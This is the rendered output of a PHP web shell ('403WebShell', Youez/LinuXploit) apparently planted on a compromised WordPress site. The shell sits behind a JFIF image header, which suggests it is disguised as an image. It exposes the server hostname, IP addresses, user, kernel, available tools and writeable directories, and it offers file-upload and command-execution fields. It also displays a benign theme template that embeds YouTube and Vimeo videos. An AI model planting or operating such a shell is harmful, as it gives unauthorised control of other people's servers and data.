????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.112.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/themes/slide/views/single/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/themes/slide/views/single/video_single.php
<?php
	$album_youtube = esc_html(get_post_meta(get_the_ID(), 'video_youtube_url', true)); 			
	$album_vimeo = esc_html(get_post_meta(get_the_ID(), 'video_vimeo_url', true));
	$website_protocol = is_ssl() ? 'https' : 'http';
?>

<div class="lc_content_full lc_swp_boxed lc_basic_content_padding">
	<?php if (($album_youtube != "") || ($album_vimeo != "")) { ?>
		<div class="lc_embed_video_container_full">
		<?php
			if ($album_youtube != "") {
				?>
					<iframe src="<?php echo esc_attr($website_protocol); ?>://www.youtube.com/embed/<?php echo SLIDE_SWP_getIDFromShortURL(esc_url($album_youtube)); ?>?autoplay=0&amp;enablejsapi=1&amp;wmode=transparent&amp;rel=0&amp;showinfo=0" allowfullscreen></iframe>';
				<?php
			} else {
				if ($album_vimeo != "") {
					?>
					<iframe src="<?php echo esc_attr($website_protocol); ?>://player.vimeo.com/video/<?php echo SLIDE_SWP_getIDFromShortURL(esc_url($album_vimeo)); ?>?autoplay=0&amp;byline=0&amp;title=0&amp;portrait=0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>
					<?php
				}
			}
		?>
		</div>
	<?php } ?>

	<?php the_content(); ?>

	<?php get_template_part('views/utils/post_tags'); ?>

	<?php
	if (SLIDE_SWP_has_cpt_comments()) {
		comments_template();
	}
	?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit